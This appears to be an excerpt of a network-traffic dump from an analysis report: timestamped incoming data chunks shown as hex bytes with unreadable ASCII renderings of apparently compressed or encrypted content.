                                                                                                                                                2022-09-29 12:51:43 UTC16417INData Raw: 8d 9e 78 44 1d a1 18 bc f3 4f 2a 95 43 dd ce e7 66 39 52 1c 18 8b 53 cf 71 c4 0e 9c 08 97 55 44 48 63 1f 47 95 51 da c6 a9 09 79 f4 71 11 f7 d7 df b2 09 2e 56 63 84 e3 b5 92 73 f4 e3 40 50 a8 92 ef b7 61 d8 5c 48 a9 72 ce 50 58 72 60 9f e2 57 2e c1 0e 6d 16 c5 bd 30 5e fd c1 da 45 e2 1f d9 f0 2b 21 f1 31 28 23 27 ea 19 10 53 8d 49 d5 6e 99 59 34 18 bf 25 fe 12 b2 56 7d 72 8f de 57 ae 8f 83 27 40 dd 22 cc 8b 06 94 fd 31 58 7f a6 ff f8 0e c7 af 0c 65 ac 1f be 52 aa e3 39 24 5e 3f 2f f8 86 62 fa d5 cb 3d 52 ce 23 83 9b 1e c7 b3 ab f8 fd c8 77 20 fd 4c 37 f2 00 e1 6a ed d0 fe 7c b1 c2 37 20 d7 11 a9 38 9f 8d b6 8a f5 19 f7 cf c4 bc 29 a6 02 77 5d fb 8b 42 a3 6c 0f a6 b6 72 d0 4f cc 50 76 c0 5c e7 81 99 34 fd 12 5b 4e 8f 32 38 76 49 0d 6c 50 09 a6 c1 59 4a 4e
                                                                                                                                                Data Ascii: xDO*Cf9RSqUDHcGQyq.Vcs@Pa\HrPXr`W.m0^E+!1(#'SInY4%V}rW'@"1XeR9$^?/b=R#w L7j|7 8)w]BlrOPv\4[N28vIlPYJN
                                                                                                                                                2022-09-29 12:51:43 UTC16433INData Raw: 09 f0 94 a2 5a fc 1d 58 b5 10 37 cc a4 27 94 3a 39 74 bd 56 7e 4f 6e 84 09 44 40 ff e8 c2 4c 74 60 61 d6 c8 ed 35 a1 1d 5f 79 28 3b 21 13 c2 d8 d9 63 c6 25 6b c6 b6 57 ea c4 b9 3f 00 a5 7a ac 6e 8f d0 f5 3e 19 8c 2a 8e 86 49 cd 0c 9a 8d b7 8b 95 38 66 bd c1 f2 ae 21 9b 84 97 00 dc 36 7a 5d d1 0a 67 a7 90 2a ea 77 f0 b6 c3 02 b2 6d 3b 2e e9 66 67 b7 94 99 29 5a 9c ae 26 1f 97 ab aa e7 40 29 68 31 56 f3 7f 06 c9 08 99 b8 9b b1 ec 72 8f 34 a9 52 0f 16 64 0e 3f 0a 47 2b 37 00 9a 52 4f d7 b0 80 41 d4 41 71 a3 90 60 13 3d e0 ec 11 bb 78 e3 9f b6 bf 3d 0d f9 dd 86 ef 56 0b 2e 52 bc c2 f3 78 33 f7 31 42 b6 5c bf d2 33 f7 58 c4 9d e8 e5 d9 44 65 d4 e0 d1 32 c2 41 a4 23 df 61 af 8b dc b4 bc c3 85 28 f6 af d9 a5 ac cc 48 b7 98 88 78 59 cd f4 f1 63 91 28 77 b0 82 78
                                                                                                                                                Data Ascii: ZX7':9tV~OnD@Lt`a5_y(;!c%kW?zn>*I8f!6z]g*wm;.fg)Z&@)h1Vr4Rd?G+7ROAAq`=x=V.Rx31B\3XDe2A#a(HxYc(wx
                                                                                                                                                2022-09-29 12:51:43 UTC16449INData Raw: 6f a8 f7 eb 9d 4f c1 72 00 6c f4 3f 19 47 b2 38 f2 68 14 db fc 1b 86 24 5d a5 6f 2d 15 75 fd 4a f8 4d 61 e3 cb b3 8f eb 2a db 36 ab 03 6e 62 e9 c7 02 61 a8 69 26 d8 cb 92 e0 91 39 56 d5 6a 66 4b ff 68 48 5e a8 65 19 55 e9 ff b4 48 fc 7a 5d 21 5e 2d 5c fb c3 f7 bf d8 37 6a e6 c7 0d 70 8d e8 4b f7 8b a4 6e 20 4d 61 59 30 ff d8 8c 82 72 81 23 6a 8e e5 ec b0 75 7d 54 1f 71 5e e6 5e ff a6 f4 10 1d 9c 8c e7 bd 66 71 d1 96 a7 01 6d 4f dc 8b c5 24 46 33 a0 e0 16 f9 c1 ce f8 95 1b 0d 50 d0 01 ab e7 bd 2c 0a 7e 50 eb ea e5 44 f6 ce dd d9 a8 6a af 96 09 18 4c e0 73 de 9f 20 52 5d fb 54 9e 76 dd 8a 24 ea 07 41 87 c1 8b 4b f2 e9 2b 2d 51 56 df a6 12 0d 2e 16 84 63 51 ee f3 89 79 ef e3 81 49 8a dd 8a 0a 00 73 d1 ed 04 bf 08 8f da c5 7c 66 40 b6 b1 8b 6f de 31 6b ec 43
                                                                                                                                                Data Ascii: oOrl?G8h$]o-uJMa*6nbai&9VjfKhH^eUHz]!^-\7jpKn MaY0r#ju}Tq^^fqmO$F3P,~PDjLs R]Tv$AK+-QV.cQyIs|f@o1kC
                                                                                                                                                2022-09-29 12:51:43 UTC16465INData Raw: 2e 3b 09 2b 34 aa 54 77 38 af dc e3 4e cd 27 06 f7 ca 68 4f 6d 78 c3 52 3c c5 f8 ed 50 e9 35 15 0d 52 dc 7a ef 8d 50 53 0b 9c b6 cd d7 d1 9c da 78 e3 21 f2 7c bd cf 95 44 54 8b 23 21 44 81 3c cc a4 63 be c8 84 fe 16 89 b1 a4 51 71 e1 df 44 d4 cd 95 b0 99 f3 77 ce ca 5d 4d 0b 54 fa a2 ea 80 37 7f 62 0a 54 b9 29 d7 82 4f 71 67 a8 14 29 bb a2 34 ee 2a 68 17 87 ac 8c bb c6 5a 9f 80 1a 29 8b 54 2a 95 c4 48 fb ea 58 aa c6 4d 61 4c ac 16 f5 39 0a 75 63 40 e8 0d bd f9 cc dc fd 75 ad c3 73 90 98 be 3c a7 39 15 4f 22 e7 3c 1e 2e da 90 2c b0 d6 5b 07 7d 8f f4 e9 49 ec 3d df 3e fd 8e 89 af 9d 6d 49 26 9e c0 1a f3 3d 3a 9d 68 63 cf 99 1d d7 14 2a b7 fc 1f 0e 1b b5 60 ab a3 9f d3 6d 9c c6 c6 85 6b 1b e6 b2 1a 8d 69 18 8d d0 ec d9 dc a5 99 f6 1c 3d 24 45 05 09 2b 0c 65
                                                                                                                                                Data Ascii: .;+4Tw8N'hOmxR<P5RzPSx!|DT#!D<cQqDw]MT7bT)Oqg)4*hZ)T*HXMaL9uc@us<9O"<.,[}I=>mI&=:hc*`mki=$E+e
                                                                                                                                                2022-09-29 12:51:43 UTC16481INData Raw: 12 31 08 5d b9 af 81 71 7c 6f 4a 85 8f 80 89 bb 07 e0 d1 1e fe ae 51 d1 d5 5e b3 da 10 ae c6 81 a7 2a f3 f2 45 d6 40 ca 0c 67 c3 b8 a1 95 75 61 60 eb 5b a6 38 5a 31 ee 39 69 5d 47 96 01 68 c6 54 5c 9a 6a 60 82 3e ea a4 9e 32 e4 91 77 75 4f 60 2c 19 cc 37 38 2c b3 b1 10 9e 29 4e a0 f2 29 e5 1d 16 bb 50 45 cc 08 36 6c 37 55 23 47 0b 0f 22 8d 2e d5 04 75 da 97 ae 17 23 d4 b9 76 52 77 c2 9f 2e 1a 97 b3 07 e3 2b 2e 9a 05 cb ac ea b6 76 a5 16 7e 70 88 74 5a 21 95 27 1b b4 a1 b3 4e 66 98 a6 24 f6 c4 1f 88 2d de a1 e8 96 aa c8 cd a0 9b 3c ad 7b e0 50 51 c8 2a 54 87 de c2 e7 00 c7 75 d8 5e da dc 47 f9 2f 89 88 63 13 eb ae 74 d2 c3 ce 75 b1 86 8d 43 10 5f 75 28 8e eb 8f d4 d7 ea 11 f9 e6 4d 1a 14 27 4e fa 35 43 03 24 8c 57 84 14 3d 0c 1a 62 b1 3b af f1 ee 33 6f 2a
                                                                                                                                                Data Ascii: 1]q|oJQ^*E@gua`[8Z19i]GhT\j`>2wuO`,78,)N)PE6l7U#G".u#vRw.+.v~ptZ!'Nf$-<{PQ*Tu^G/ctuC_u(M'N5C$W=b;3o*
                                                                                                                                                2022-09-29 12:51:43 UTC16497INData Raw: ae 98 f5 3e 50 0a b5 bc 89 bc 3c 15 ec 97 83 46 82 67 ff 7f 16 37 6c 47 94 b2 e2 40 9e ec ba 41 d2 dd 0e 4a a1 7f 9f 28 b4 a3 39 d2 00 01 5f 6a 1e d6 a6 c7 2f f0 54 fb bb 7c ac df 56 4a de 35 6f e9 99 85 02 c3 42 19 d4 08 ef 8b 5b 09 7b 04 a1 b9 c3 bb 6d df f6 a4 3e fe 5b ae 3b 28 fb 6f 84 83 11 91 84 4c c0 d1 be d4 ef 7d 89 d7 61 a2 31 da bf 11 ad c6 7c 75 72 21 bd f0 2e 84 50 9e 69 0b 07 0f db a1 1f 44 e7 f9 db 22 7a af 33 e9 87 2f 7e 52 11 63 85 af c5 bb e1 00 ab 55 b2 a0 b9 97 c3 d0 e5 ff 78 d9 6e d5 cb 07 89 ed 92 f5 b7 7c d3 b7 d2 15 7c 57 02 73 7e b7 05 33 2e e5 d2 4e 4b 94 6f 20 01 81 b3 45 f6 1f 39 1e ce 41 e1 d1 d4 76 c0 f0 e8 29 8e 95 e9 02 55 11 d1 82 12 f3 49 c6 0e 76 e8 2d 5c d0 c9 3d 53 0e 84 06 88 65 69 82 5a 20 61 d1 e6 d6 87 3c 22 c8 a5
                                                                                                                                                Data Ascii: >P<Fg7lG@AJ(9_j/T|VJ5oB[{m>[;(oL}a1|ur!.PiD"z3/~RcUxn||Ws~3.NKo E9Av)UIv-\=SeiZ a<"
                                                                                                                                                2022-09-29 12:51:43 UTC16513INData Raw: 7c fd 90 17 0e bc 64 56 a6 8f cf 14 27 5f ee a7 19 1b 8e c8 df d2 09 4d 94 a0 a1 39 70 71 d7 8d f0 de 6a 4b e8 fa 1f d7 8d 45 6e 89 49 70 9f ef 31 f3 06 3a 15 90 d7 6a 92 21 69 3e 97 8b b8 25 e7 82 f7 98 df e0 52 01 44 66 df da 3b 9a da 1d b0 93 54 75 64 d3 32 93 4f 59 92 be c5 bc 45 fb 27 ac f6 79 2c b8 c5 52 2d c0 db 70 6a d0 b9 99 ec f2 dd 55 d2 c0 7c 71 9d 26 85 e8 39 b4 77 0f a0 0c e1 51 30 9b 46 84 75 8e 76 e0 31 43 70 ab 9b 01 15 15 2e 50 60 8e 1c ac c1 eb 53 6a 95 35 55 ff 18 08 20 a4 bb 4c b9 5e 5f f7 97 ab 44 0f 23 f0 c1 7f 0a a3 fc af 7a 40 1c 95 a5 f1 59 1f 2b 4a b4 87 23 8b 09 10 19 3b b1 24 82 ba 15 4d 37 85 89 8c e9 2b 54 47 eb fc 86 62 1a de 0d b0 4b 36 bd dd 9d 14 fe 01 34 c4 42 c0 c8 d4 a2 76 5e c8 8c dd 38 0a 37 db ee 2b 0f 5c 2b ad 8e
                                                                                                                                                Data Ascii: |dV'_M9pqjKEnIp1:j!i>%RDf;Tud2OYE'y,R-pjU|q&9wQ0Fuv1Cp.P`Sj5U L^_D#z@Y+J#;$M7+TGbK64Bv^87+\+
                                                                                                                                                2022-09-29 12:51:43 UTC16529INData Raw: 77 54 9a 6c 64 db 0b 81 c9 78 ca fa d4 a4 3d 55 9a 8c f7 cb f6 54 85 9c 1f 34 df 5c 86 48 50 e4 91 fe 04 19 1f 35 6e 76 dc 7e 44 7d f5 b6 0b c5 61 b1 3e 81 ac de a1 63 35 08 da a8 47 18 c0 2f a0 72 93 9c ec 67 9b 85 bb e7 ca ee 76 88 80 91 90 2a a9 da a9 19 96 25 e0 63 e8 a7 42 fc 36 2f c1 b5 88 a4 0c 27 cc d5 2f 63 f5 51 dc 85 e4 8c f4 7a 5d 3d f5 70 95 e4 e8 91 44 3e fc dd 18 c6 f0 7d ff 72 4c fe 1e 1b 0a 58 f3 46 1b 4d 9a 25 b5 c5 ff 8f bb 02 1f 41 82 15 3f cc dc be 71 4e 73 02 4a f8 e1 a6 bd db 9c f7 4b 23 f6 9c 10 50 8d 39 16 56 6f 90 3b 7e af 43 62 6e 37 85 5b e7 e3 17 02 97 4c 15 53 a4 53 7c 0e 6d 49 1f 7f 58 34 dd cb 4e 1a d9 0e 82 a8 37 d8 f7 ec 78 88 b1 2a c8 86 6c 81 bb e2 1c 24 81 11 fd 2c b3 d3 b5 1a 5b 63 ef 2e 48 ce ba a9 7a ee db 2f be 59
                                                                                                                                                Data Ascii: wTldx=UT4\HP5nv~D}a>c5G/rgv*%cB6/'/cQz]=pD>}rLXFM%A?qNsJK#P9Vo;~Cbn7[LSS|mIX4N7x*l$,[c.Hz/Y
                                                                                                                                                2022-09-29 12:51:43 UTC16545INData Raw: 00 fd 30 88 06 fa 54 65 9c 04 85 74 f7 0a a6 c5 1e 6a 7f 6c d7 2b e6 fb 51 ec 10 66 58 3f 80 dd ad 1d 0f 8e 1a 78 09 8f 0b 56 35 2d f0 e1 9e f7 53 1d 32 6a a9 f1 45 a0 05 79 94 60 84 d2 ac c5 2b 42 19 87 3c 9b a5 fd 19 6d 47 0f df 54 ad 6f cd 8f 53 43 aa 78 69 cd ec ea 63 e5 43 9d ae 2a f4 1c 68 09 30 d0 92 d1 2e db 15 c9 87 40 78 02 eb 87 28 07 4e 36 47 74 18 dd 93 a6 2b b2 09 a9 0c 0d b0 47 7e 97 37 ec 70 0e 13 2e 85 72 00 2e 12 ec 51 9a f7 ed de e3 37 9c 9a bb 1f 19 6b 01 47 2d 53 96 65 4f a4 21 f3 52 f3 ea 06 93 d2 c5 61 02 60 08 d1 08 b8 53 3e 54 53 28 34 96 41 6f 6a c5 11 38 a5 b4 d3 c0 80 e6 df d1 3e e1 a4 10 9e 77 e4 b1 d5 ec 98 8b 05 ac ec 1e 72 f7 63 e9 83 0c 59 66 a7 8c 53 76 9d ea 84 57 03 60 e8 3e 00 14 e6 04 c6 a5 33 7f fa f6 6b c4 01 9b 2e
                                                                                                                                                Data Ascii: 0Tetjl+QfX?xV5-S2jEy`+B<mGToSCxicC*h0.@x(N6Gt+G~7p.r.Q7kG-SeO!Ra`S>TS(4Aoj8>wrcYfSvW`>3k.
                                                                                                                                                2022-09-29 12:51:43 UTC16561INData Raw: bd 7d 1e 41 eb 4c 57 a4 df c1 f5 08 22 e0 da 69 89 7e 9b 25 b8 1c 48 a1 12 13 f1 d8 60 d6 9c bf 66 50 1a 8d 44 ec 74 d4 3c 89 60 16 ee d9 c8 44 b7 ba e6 e2 73 9b ae 39 e4 f3 c2 81 5b be e6 87 a8 e9 fe 39 b3 e7 a0 43 83 18 bc 35 c2 c8 52 53 58 9d a9 2a 64 eb 2a 05 8c 86 84 5f 51 0c 1a 54 02 b5 11 12 f9 31 e4 00 8d e4 85 85 73 09 aa a8 cf 19 e5 c1 49 32 b7 aa 7a c5 e7 d3 76 6f 57 43 5f bf 32 1f 22 e5 60 8b ea c8 3b a1 8f 11 5b 77 60 79 5a 6e 36 00 9d 06 6a fa 40 c6 da 6a b6 14 27 ba 4e a9 ec 88 7e ec e4 6b 99 12 7c af 28 8a 13 e3 9d 4e 52 5e 01 e4 d1 8b ae b0 87 8d 43 e2 70 ee ec 6d 59 a3 80 3a 9a ed 19 cb ae f5 9c bd fb ab 44 18 40 2e 12 cf 5c 9c 58 59 2b f6 41 d6 84 ec f7 6a 03 af 24 9a fb cf b4 fa a0 42 c5 db ed 19 13 2e 43 79 43 a2 9a 4d fd 99 f1 54 84
                                                                                                                                                Data Ascii: }ALW"i~%H`fPDt<`Ds9[9C5RSX*d*_QT1sI2zvoWC_2"`;[w`yZn6j@j'N~k|(NR^CpmY:D@.\XY+Aj$B.CyCMT
                                                                                                                                                2022-09-29 12:51:43 UTC16577INData Raw: ed 06 57 40 31 1e 66 29 47 a4 b7 e1 c6 2f 43 e4 b3 1a df 93 d0 94 f8 e5 29 d5 d2 7a fc f1 02 35 82 e3 3f 90 a7 42 48 1c de 32 89 b8 a8 37 dd b4 fc eb d1 a6 57 8d a5 de ea a7 41 33 94 0a c6 93 f0 68 ad 6a af 91 b8 9a 89 bf 1f 7a 10 a1 06 f7 e5 df 4b 64 56 01 e3 32 50 4e 74 68 56 a2 ff 5e 75 22 ff 06 ff bb bb a1 0b dd 70 9e a5 2e b3 60 8f 19 4e ed 79 c7 a7 4c d7 62 e7 4c 41 1a fa 53 20 2a db 0f f1 86 4c e6 3a 2c 22 8f 29 3b 65 f2 25 94 3c d3 13 5c 25 19 f8 11 3a 7f b7 04 4b c5 46 d8 99 2d 3c 0b 28 82 0f 8e ad 73 10 db 6b f7 57 2a c9 3f e6 7c 40 fb a1 ea fc 6d dc 55 53 fa 63 f9 53 08 b3 ff eb d5 a8 7f 1c f3 b4 df 17 98 01 09 2c 48 bf 37 fb a4 79 95 42 86 61 6e b3 46 80 27 14 d0 85 32 f3 6a cc 12 08 16 29 91 39 e1 9c 20 41 e3 56 e9 ba 97 7d 48 8d a7 fc 5b 37
                                                                                                                                                Data Ascii: W@1f)G/C)z5?BH27WA3hjzKdV2PNthV^u"p.`NyLbLAS *L:,");e%<\%:KF-<(skW*?|@mUScS,H7yBanF'2j)9 AV}H[7
                                                                                                                                                2022-09-29 12:51:43 UTC16593INData Raw: a3 68 39 94 d6 74 7d 56 22 09 4d 55 cd dd 01 6e 56 bb 19 1d 67 69 36 ea 5c 2f 5d 7b e2 e6 3c 8e 5c 40 19 d3 fd b9 3b 89 dc 66 05 9e e0 36 16 9a 2b 97 6f 66 12 3f 49 b8 08 e0 cd 62 e5 6f ff 1f ba 5c 48 47 98 17 d4 f8 aa 02 c3 60 f3 e7 b6 ba 20 de 47 63 cb 3b ab e8 0f 26 59 a5 04 1b f2 7e 87 78 be 2b ee 9a bd a1 b7 ea ac c4 a6 03 22 ce d9 c9 5d 8e 78 77 49 41 fe c8 c4 f2 a7 e2 c3 cd 00 34 7b 09 ba 8d a9 8a 9f 27 6d fb 12 2f c6 7a 0f bd 74 4f 14 14 98 b6 eb 98 68 3f f4 2d ab 5b d9 ac 75 62 25 8d 56 56 19 3a 9b 56 0a a3 ce 95 f9 0f ff 35 c0 a3 00 1e 47 af 15 c3 61 d5 a1 d8 fb 63 81 78 61 c1 8a 7f 60 a7 17 bb 91 a3 28 b8 71 c4 f0 fd 05 cb 9c 7c 6d 08 33 50 23 01 fd 12 9d 2b 15 5b df 69 41 fc e0 e7 27 30 e6 58 dd bf 23 1f 94 29 54 40 40 7f a3 76 36 66 9b f9 3e
                                                                                                                                                Data Ascii: h9t}V"MUnVgi6\/]{<\@;f6+of?Ibo\HG` Gc;&Y~x+"]xwIA4{'m/ztOh?-[ub%VV:V5Gacxa`(q|m3P#+[iA'0X#)T@@v6f>
                                                                                                                                                2022-09-29 12:51:43 UTC16609INData Raw: 44 d6 b2 f9 5f 15 99 ee a3 76 19 97 06 76 0c 39 6c a0 5b 2e f1 75 11 39 0f 1f 68 36 23 f1 38 b9 ce b4 64 e5 7f 3c ce a2 0a 22 c9 40 d8 85 d1 8c 6b 23 a8 cc 7a 30 71 cf 07 a6 78 e6 32 c7 12 c8 ff 04 c4 8f 57 04 11 50 0c 91 ac 75 27 41 93 96 ab e8 d0 ab a0 a9 19 4a 65 a4 49 51 c5 2e e9 95 06 32 2e 26 88 42 bb 40 30 26 58 5d 3b 60 41 65 0e 31 da 57 5d 03 80 10 c1 6b 67 16 7f c5 aa 7f 7b d3 2c c1 56 95 f3 8a ec 4b 5d 99 6a dd 38 bc ba 4e 1c 89 82 5f f7 a0 b4 88 50 98 7e 67 02 c4 be 3e 6e a0 34 8e 6b e5 30 59 bc d6 85 e2 86 c8 2d 1b a4 eb 84 71 26 09 df 18 d8 ce 77 09 87 72 97 df 60 d9 10 d3 e0 eb b6 51 51 fc 9c 4d 4c af d7 ba 44 5a 6a 55 27 cd 3a f0 a2 ce 42 1b 6a eb c8 cd 7f eb 03 fa d4 97 d7 07 a9 4a 70 71 ac a7 35 10 1d 17 fd 74 51 76 51 d6 22 b6 1a 65 94
                                                                                                                                                Data Ascii: D_vv9l[.u9h6#8d<"@k#z0qx2WPu'AJeIQ.2.&B@0&X];`Ae1W]kg{,VK]j8N_P~g>n4k0Y-q&wr`QQMLDZjU':BjJpq5tQvQ"e
                                                                                                                                                2022-09-29 12:51:43 UTC16625INData Raw: c4 9c 2c f5 e5 14 44 f2 b4 6a c3 eb 86 5f fb 26 92 12 52 95 0b 20 85 1e 97 eb b5 87 6a 35 9b 11 c2 45 e2 ba 9b 83 b6 63 c3 5c f8 77 e9 12 1b a1 65 89 9e 3d 33 1c b2 ca 47 14 36 fa 8e dc c2 06 65 5d 63 5a ed ac e1 e9 7c 18 54 11 3d a3 52 7e fc f6 2f a7 ae a9 18 e1 23 65 d3 1e 18 de 13 5b 94 d9 e2 01 29 92 7b 1b ff 1b 7c 1e 7b 05 f5 eb e1 3d 62 b8 3f 1d 62 5b f9 40 2b 25 1c 88 75 fd 32 6d a4 1f 2b ec 59 f2 77 d6 97 2c 98 29 20 36 f9 bc fa cc 64 6b d7 23 d0 cb de a1 68 db 3f ca fd e0 5b 8e cf 10 1a ac 2d 38 f9 fa 55 68 9c d5 14 9e 64 83 4d 75 39 60 f0 a1 7f d1 4b 77 0d 30 eb 12 cf 7c 11 9b ee 77 a9 03 aa e3 9b 6d 4b d7 da d9 78 0d 3a 01 0f c5 fd 34 90 34 51 8d 8c c2 ea 38 47 a2 f4 a2 a0 d2 79 62 3e 50 7a 65 cf b4 4e a9 8b a9 96 40 18 45 6b ed 86 29 4c 16 12
                                                                                                                                                Data Ascii: ,Dj_&R j5Ec\we=3G6e]cZ|T=R~/#e[){|{=b?b[@+%u2m+Yw,) 6dk#h?[-8UhdMu9`Kw0|wmKx:44Q8Gyb>PzeN@Ek)L
                                                                                                                                                2022-09-29 12:51:43 UTC16641INData Raw: 3e f5 98 e8 47 69 f2 14 c9 6b 06 87 49 f3 d3 68 cc f8 d3 91 e6 72 6b fd 1d 1e a5 b8 4b e7 44 e5 58 4c dc ca b5 2e 4d c1 48 4d ab 6e 58 5a 39 10 c1 d9 0f f3 37 35 9a 6d 76 1b c6 eb c9 dd c2 6a 3c 88 1f 9d 9d 22 94 fa 7a 39 7c 61 65 e8 c9 d5 f8 77 7c 71 05 e7 b4 b9 5b 0c f0 02 46 7f 20 04 87 5f 0b 80 bb 87 d0 1b df 9f 3e 31 0b d9 bb c0 f0 7e ef 5c d0 98 66 f5 22 6e 2a f4 c6 70 40 ae a3 fc 5b f3 de 16 08 9a dc c4 38 f3 d7 83 ef 8b be 4c 7c a3 25 d5 02 0b 6b 93 3e 8b 2a 33 05 a9 c0 f0 2a 1b 63 6c 6c 7d 0a fd c9 2c a2 7e d0 b8 ae 5d 69 cd f8 20 c7 f9 4f 1a 9b 12 33 66 97 94 e5 06 6e 82 0c ec 71 e2 56 f4 a9 1f 94 ec 3e 05 1a 97 08 f7 b0 f0 f2 0d 45 9c 72 57 1e 70 88 4f 73 e2 d7 89 cc 4f 8c 08 16 67 8d 49 b2 eb a0 59 73 d4 47 87 41 45 73 c8 c9 06 00 5c 71 15 71
                                                                                                                                                Data Ascii: >GikIhrkKDXL.MHMnXZ975mvj<"z9|aew|q[F _>1~\f"n*p@[8L|%k>*3*cll},~]i O3fnqV>ErWpOsOgIYsGAEs\qq
                                                                                                                                                2022-09-29 12:51:43 UTC16657INData Raw: 83 1d d8 51 f6 1e 81 56 57 d5 64 12 6f 3f ce 61 93 35 44 82 d2 aa da 5a ee 7a dd 0a 1f 30 74 f1 5c e4 fa 4c c3 f8 b8 9f dc a0 39 9a 10 3d 52 9e f6 f4 2d 55 60 3d 77 76 03 aa 8e 7d 89 ee a7 ea 6e aa fb ad 94 11 7c 42 31 37 e0 9a 8d 0b ab 59 58 d1 b0 e6 59 d0 5f 9c 9e 77 b9 b9 12 49 0d bd c7 26 53 c1 e9 c3 83 ef a4 53 2f b2 51 25 12 14 e4 a8 a4 a8 d4 c7 17 94 8f d8 9e 29 e4 6f a6 02 9c 70 22 17 9b fe 5c 50 d3 c7 04 82 11 e5 1f 2a 9c 05 1a e6 cf ac b3 94 08 52 97 54 4f 2c 7e e3 4f 3e 4e 15 42 a3 a5 73 60 d0 94 93 71 3b cb 38 6f df d0 6c ea 89 f7 91 b8 ac b8 a9 07 e0 a6 8c a9 06 5f ed 33 75 5a 82 24 e3 26 0c 70 1d 2e a7 d4 44 d8 d5 b0 01 a1 bc ca 66 eb af a8 c8 e4 f6 36 4d b2 43 36 45 d8 78 9d 71 04 4b 6b 54 64 1e 1c bf 8b 24 c2 3b 28 7e 7e 3b e4 9c 54 ca 68
                                                                                                                                                Data Ascii: QVWdo?a5DZz0t\L9=R-U`=wv}n|B17YXY_wI&SS/Q%)op"\P*RTO,~O>NBs`q;8ol_3uZ$&p.Df6MC6ExqKkTd$;(~~;Th
                                                                                                                                                2022-09-29 12:51:43 UTC16673INData Raw: 27 0a 69 fb 35 7a 79 ad b4 80 ef d5 2a 11 79 eb 8c 63 53 50 e7 53 87 82 4a 09 a1 ec e2 9b 7d 9a 14 85 8d 47 17 b0 8b 36 ee 20 39 f6 03 e8 50 54 87 e5 3e a1 78 82 73 e7 9e a5 75 8c 6c b9 04 0a c0 61 18 a5 a0 a3 93 22 82 37 8c 84 aa fd ea de f3 67 4c 20 2f ae 95 9f df 6f 04 6e c8 cb e4 35 59 02 b5 1c 67 df 3b 3f 16 62 ff 2d cf c2 d3 cf b1 44 3a 76 eb 88 d0 cc d5 54 a5 a9 b4 64 6b 7f ba 46 d5 a7 23 e6 57 e4 8d 8c 56 37 78 c3 03 6c 14 33 63 76 79 a0 01 8e 05 cc a0 25 92 64 07 e0 a9 81 a3 01 9d 81 7b 1e b0 2f 50 40 b4 c4 fa dd 2c 8e 6a 3e a4 81 08 fc 57 c5 41 13 76 f5 52 70 a7 69 b5 57 a4 0a c8 da 37 4b ff 35 d1 e3 54 55 a2 f6 2e c9 2f f0 8a 89 5f 07 37 3a 34 b1 96 df 17 c1 68 da 89 75 fe 35 f3 66 28 9a 20 98 72 3d a1 0a 44 03 8c fc 44 13 3d c5 b9 0b 66 6e d1
                                                                                                                                                Data Ascii: 'i5zy*ycSPSJ}G6 9PT>xsula"7gL /on5Yg;?b-D:vTdkF#WV7xl3cvy%d{/P@,j>WAvRpiW7K5TU./_7:4hu5f( r=DD=fn
                                                                                                                                                2022-09-29 12:51:43 UTC16689INData Raw: b1 c1 da a1 91 09 fe 32 6d fe e5 89 35 dd 42 13 4d 26 7d 40 64 ea 94 b5 54 e9 16 46 72 c7 3d c3 f9 28 59 cc 27 a9 e4 52 cb 08 c6 2a bc aa 85 ed 8e 4b 1b 98 c8 69 d0 f2 5c bc 6b be f3 0d 4a d6 0d 39 c6 ed 26 6f cd bd 6a 9c c3 fc cb a4 86 0d 9d ca 07 eb 77 41 a5 33 dc bb 49 59 22 ab 54 30 03 43 dd 68 f4 fe 6b 62 4c 58 af 36 d5 32 37 28 72 0c ac 85 20 df 0e 77 1a ac 9b aa 82 44 0d 9c 89 31 e6 7f 6b 29 fd e8 42 67 01 33 64 c0 ad 42 8e 9c 50 0e 41 08 f4 fb 9e bb 0c ab ad a1 7c 78 31 3a 07 17 a4 81 b8 80 2a d0 84 7d 2a ff 47 15 a0 ad 8e 81 04 28 c9 1d 55 b9 f8 78 a7 1d d8 f3 49 fa c7 54 03 dc e3 19 8d a0 20 df ce 0b 7f 17 ec 41 b6 dc de 70 37 5f e1 59 2c 54 d5 8b a5 a8 e0 31 1b 3b e4 e7 66 5b 11 7a a7 64 7c 5d f1 21 65 51 14 28 0c 63 13 88 2f 2a 6e 2d 46 c4 a2
                                                                                                                                                Data Ascii: 2m5BM&}@dTFr=(Y'R*Ki\kJ9&ojwA3IY"T0ChkbLX627(r wD1k)Bg3dBPA|x1:*}*G(UxIT Ap7_Y,T1;f[zd|]!eQ(c/*n-F
                                                                                                                                                2022-09-29 12:51:43 UTC16705INData Raw: f9 58 2e 41 99 fd 9a ad ca ae a8 6c 19 30 50 95 1c b0 84 40 3e 71 10 92 40 db 0d a6 31 e0 6b 2d b5 1d cf c2 08 54 d2 80 e3 28 a6 3c 01 be e0 04 52 88 5b 5d ce 38 a1 61 2d bf 82 fd 8b 5e f1 96 fa 1a 8a 08 36 f9 0b a1 51 6f 9d 47 f3 ae 1b 84 6b 6c 03 a1 b9 45 cf 2e fc 37 93 c7 f6 e8 c2 96 54 03 c8 35 07 f7 7a 19 01 97 55 72 aa 13 eb 11 a0 e8 b1 13 bc 22 c3 8d 2a 5b 17 06 b8 d8 6c 1c 2a 71 01 53 aa 74 af 9f 94 12 b8 f4 61 0d 21 7a e4 a6 db 08 de 3b 47 43 4b 01 94 47 32 e1 57 2d a2 22 23 92 e1 a4 a7 d4 ae 60 8e d9 7c a1 be e1 50 18 b2 8f dc a5 e6 f8 f6 7f 94 7b 83 86 fe be a8 14 ed ac e3 3a ed 02 2b d4 64 d5 87 cf b0 fe 37 9f 1f 8a 71 8e 1d 46 72 2b b1 3e a1 99 c8 10 4e f3 05 24 3d 94 71 24 de c5 5a 4e 89 cc 76 46 75 4a 73 b1 1f 7a 7c a1 96 32 73 6b 8a f8 49
                                                                                                                                                Data Ascii: X.Al0P@>q@1k-T(<R[]8a-^6QoGklE.7T5zUr"*[l*qSta!z;GCKG2W-"#`|P{:+d7qFr+>N$=q$ZNvFuJsz|2skI
